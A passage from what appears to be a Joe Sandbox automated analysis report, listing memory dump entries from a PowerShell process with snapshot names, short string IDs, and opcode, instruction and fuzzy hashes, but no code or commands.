                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Pp#I$Pp#I
                                                                                                                              • API String ID: 0-4095597710
                                                                                                                              • Opcode ID: a5eff9e9e3ded0a1d7ce5944d35538647f720e3f261e6189c9c11faabff8bf81
                                                                                                                              • Instruction ID: f2590664be11063fabb83de744272f0267595999863572a52e5a5a06ed8abfb5
                                                                                                                              • Opcode Fuzzy Hash: a5eff9e9e3ded0a1d7ce5944d35538647f720e3f261e6189c9c11faabff8bf81
                                                                                                                              • Instruction Fuzzy Hash: DC41D331C0CE5D8EEB64EB58E8417F9B7F0FF58360F0041AAD04EA7281DB7969858B85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              • Opcode ID: 56e31b948d9dbf6cb00ba308f38e73cc9186afecf8d2b4cb58a813ba840e75c0
                                                                                                                              • Instruction ID: 97877849435b2f742d3a32769b3407e9a75ce4ff32b02707061b38cce1404e33
                                                                                                                              • Opcode Fuzzy Hash: 56e31b948d9dbf6cb00ba308f38e73cc9186afecf8d2b4cb58a813ba840e75c0
                                                                                                                              • Instruction Fuzzy Hash: FFB1483181D6CA4FE756EB2898516F97BE1FF56350F5802BDC0898B1D3CF2AA406C395
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: P>#I
                                                                                                                              • API String ID: 0-1964349041
                                                                                                                              • Opcode ID: bc793786a1560b6d95ba5351221b1c21d025ce4aa8ba763affd30f04e04b0d59
                                                                                                                              • Instruction ID: 672dcc874b5d92d0e5fb69fa0b9c6e1026a7751ebf810cc992ef406ed22d89e8
                                                                                                                              • Opcode Fuzzy Hash: bc793786a1560b6d95ba5351221b1c21d025ce4aa8ba763affd30f04e04b0d59
                                                                                                                              • Instruction Fuzzy Hash: EE416E31A2D9194FDB59F72894566F9B3E1FFA8340F5041BAD00EC36C2EF39A9458B84
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Pp#I
                                                                                                                              • API String ID: 0-252786363
                                                                                                                              • Opcode ID: fcf90943f289c19bc231f99e8c7dc132d7af5cc202d02021eb4105c78e140e46
                                                                                                                              • Instruction ID: 05a62e5dab5bcea5c4879011be90be79b09c9b1cff5dbe2eb5e016e027559dd5
                                                                                                                              • Opcode Fuzzy Hash: fcf90943f289c19bc231f99e8c7dc132d7af5cc202d02021eb4105c78e140e46
                                                                                                                              • Instruction Fuzzy Hash: 7A41403190CA1D8FDF55EB58D841BE9B3B1FF64310F00819AC04EA7241DB75AA85CF85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: P>#I
                                                                                                                              • API String ID: 0-1964349041
                                                                                                                              • Opcode ID: 3c1e0adc7754cd7de224277d459f9e0b11c6dd52f44b142a66f03fa90c0e5aa5
                                                                                                                              • Instruction ID: 81e9f85a24d8422caf829fc7084e128fac31391dcd46041ef9e9807029739d90
                                                                                                                              • Opcode Fuzzy Hash: 3c1e0adc7754cd7de224277d459f9e0b11c6dd52f44b142a66f03fa90c0e5aa5
                                                                                                                              • Instruction Fuzzy Hash: F9F04F32A1CA6D8FEB94EF18A8053EA73E1FB48361F400076D50DE3291DF36AC118781
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 37bc7d4016ff7bbc0253e0a4f6393f791608c83eaa55a77d2680e6b20e4be39f
                                                                                                                              • Instruction ID: 2f0a49f58a5ecf882731676481c4c356455c195d8f74c01f30cd6a545171f5e1
                                                                                                                              • Opcode Fuzzy Hash: 37bc7d4016ff7bbc0253e0a4f6393f791608c83eaa55a77d2680e6b20e4be39f
                                                                                                                              • Instruction Fuzzy Hash: DA61B131E1CE8A0FEB69E73498656B97BE1EF65380F10017ED40AC71C2EF29AC458795
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 86443adb5415fec9e80c39348be14b3137863bd495f3a117eaf6567ef7a0bd39
                                                                                                                              • Instruction ID: c47d2a2c1c358f8f202d6832413b227a6a562370c9e347794cf78ef6fef9f8a8
                                                                                                                              • Opcode Fuzzy Hash: 86443adb5415fec9e80c39348be14b3137863bd495f3a117eaf6567ef7a0bd39
                                                                                                                              • Instruction Fuzzy Hash: 5231D130A1C7858FD381EB78D4482AABBE0FF99354F000ABAE488C3296DB64D4808742
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b70b13c6d92c3c662dfbbb867989395930930d188d15d1ddd20f5922662a31bd
                                                                                                                              • Instruction ID: 4ac1de85e0a66196e8527a258649d980b9d9c628e9c41a297f224e932d2511fd
                                                                                                                              • Opcode Fuzzy Hash: b70b13c6d92c3c662dfbbb867989395930930d188d15d1ddd20f5922662a31bd
                                                                                                                              • Instruction Fuzzy Hash: 1D11C231A1CA498FD750FB78D888A66B7E1EB98390F104F3AD409C32A5DF74E484CB81
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                                                              • Instruction ID: e9f93d0ff66fc18f57d6115c6f1225f29c70dfb9f3667c92c09f1307ec3c5850
                                                                                                                              • Opcode Fuzzy Hash: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                                                              • Instruction Fuzzy Hash: C601803090C94A4FEB69F774D865ABEB6F0EF51360F10013DE04A935D2DF2A2840CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                              • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                              • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 319611a33bcff28fb9723e738c201011cd8c6e46629de334fb4eb2454851fa68
                                                                                                                              • Instruction ID: 989345e6ef73742d3f9360fba0557f7ea981d37fed0bb0c574be9b8e068a5518
                                                                                                                              • Opcode Fuzzy Hash: 319611a33bcff28fb9723e738c201011cd8c6e46629de334fb4eb2454851fa68
                                                                                                                              • Instruction Fuzzy Hash: F301F76180EBC54FD366EB3894551A2BFE0EF5622070946FFC089CA597DD18688AC366
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bef0b19828f1a865a208c5093b8658bc6298e82f9254e2db79ec19a463633fd9
                                                                                                                              • Instruction ID: 3ed30a9c18be731acae58672c9576d3d08beb16f44d938d4255274c49acac12c
                                                                                                                              • Opcode Fuzzy Hash: bef0b19828f1a865a208c5093b8658bc6298e82f9254e2db79ec19a463633fd9
                                                                                                                              • Instruction Fuzzy Hash: A8F0A730D19F494FD7A9EF3C90451A2B7F1EF593207044BBBD04EC7296DE28A9898794
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 793e34f7d8b52fae5d9499da8b7521d151bbd6a1d9888043cdbe2a4a5ad68460
                                                                                                                              • Instruction ID: c94b596df065e94bfcfea8550642b133b8eb881da52fc75181aa33f77f010774
                                                                                                                              • Opcode Fuzzy Hash: 793e34f7d8b52fae5d9499da8b7521d151bbd6a1d9888043cdbe2a4a5ad68460
                                                                                                                              • Instruction Fuzzy Hash: 10B01293C0EFC20FD2664E3428200601E647F76A4071910E7C0484B1DFD6148F058365
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0~#I$8|#I$X}#I$`{#I$x~#I$}#I
                                                                                                                              • API String ID: 0-177549371
                                                                                                                              • Opcode ID: ce3ef28d813a2bcdc31cc15b29a9acb912124f062ee86410c5685ffe745b0ec4
                                                                                                                              • Instruction ID: ba2c54ba74d1269289d97f70603f33ccbeeb0edbea7eb4441c5e16d9ce389bb7
                                                                                                                              • Opcode Fuzzy Hash: ce3ef28d813a2bcdc31cc15b29a9acb912124f062ee86410c5685ffe745b0ec4
                                                                                                                              • Instruction Fuzzy Hash: AFA1E676E0E9894FE669A73C7C151B97B90FF92661F4803FBC048871DBDE1E58068385
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0~#I$8|#I$X}#I$`{#I$x~#I$}#I
                                                                                                                              • API String ID: 0-177549371
                                                                                                                              • Opcode ID: 05384d8610841b83ff9be828b6c5711494eead03b09d775e1e328e201a58cc80
                                                                                                                              • Instruction ID: 3a8c14b8267e7702a26201e8a4eacf57cd5a7d85a8ce637a15c8aefe4b4b471c
                                                                                                                              • Opcode Fuzzy Hash: 05384d8610841b83ff9be828b6c5711494eead03b09d775e1e328e201a58cc80
                                                                                                                              • Instruction Fuzzy Hash: 0371A266E0F9CA4FE26A673C7C111B56B54FF92662F4803FBC1488B1DB9D1E580A4389
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (u#I$Pt#I$pu#I$r#I$t#I
                                                                                                                              • API String ID: 0-1497965943
                                                                                                                              • Opcode ID: 787a913184030d3b689ddb6d2d4702425f2d92a2057695a0b66522d69ee34058
                                                                                                                              • Instruction ID: 0588725a90c51c7cae604b301fc00b9f8d56f36f13b02d2cd13d9bf9e38e9ca3
                                                                                                                              • Opcode Fuzzy Hash: 787a913184030d3b689ddb6d2d4702425f2d92a2057695a0b66522d69ee34058
                                                                                                                              • Instruction Fuzzy Hash: D80175A2E0ECC54BE528167C3C1103A6B98FBA6B60B5943FAD148070DF4929D9094388
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @z#I$X}#I$`{#I$}#I
                                                                                                                              • API String ID: 0-4190855374
                                                                                                                              • Opcode ID: d66a0f90b350419a4aa4c2e5bcb2b4525afdc0ce20ded12b88f0fec5ae84fe08
                                                                                                                              • Instruction ID: b912603b0601954da75277b8d77cf2e4239cb8ff91fcff315c8f04fc6ee8a3f9
                                                                                                                              • Opcode Fuzzy Hash: d66a0f90b350419a4aa4c2e5bcb2b4525afdc0ce20ded12b88f0fec5ae84fe08
                                                                                                                              • Instruction Fuzzy Hash: B3E04F92C1EEC24FE396873528201202E60BB72550B4900FAC088471D797155D08938A